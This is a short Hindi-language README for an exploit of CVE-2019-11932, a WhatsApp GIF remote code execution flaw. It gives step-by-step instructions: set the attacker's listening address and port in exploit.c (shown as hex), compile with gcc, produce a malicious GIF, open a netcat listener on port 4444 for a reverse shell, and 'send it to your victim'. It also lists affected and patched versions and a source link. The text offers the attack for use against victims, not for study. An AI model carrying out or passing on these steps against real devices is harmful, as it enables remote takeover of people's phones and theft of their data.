
CVE-2019-11932 के लिए एक्सप्लॉइट, जो WhatsApp GIF रिमोट कोड एक्ज़ीक्यूशन भेद्यता है। एक्सप्लॉइट को ट्रिगर करने और रिवर्स शेल प्राप्त करने के लिए कंपाइल करें और चलाएं।
exploit.c फ़ाइल में लिसनिंग एड्रेस (हमलावर का) तथा लिसनिंग पोर्ट संशोधित करें
निम्नलिखित हेक्स कोड :
3139 322e 3136
382e 322e 3732 2034 3434 3420
कोड कंपाइल करें :
gcc -o exploit egif_lib.c exploit.c
कंपाइल की गई फ़ाइल ./exploit exploit.gif चलाएँ
आउटपुट को एक gif में कॉपी/पेस्ट करें
netcat लिसनर चलाएँ :
nc -lvp 4444
अपने पीड़ित को भेजें!
प्रभावित संस्करण : 2.19.230 और उससे नीचे
आधिकारिक रूप से संस्करण 2.19.244 में पैच किया गया
स्रोत : https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
लिंक्डइन : https://www.linkedin.com/in/thomas-lounis-749456175/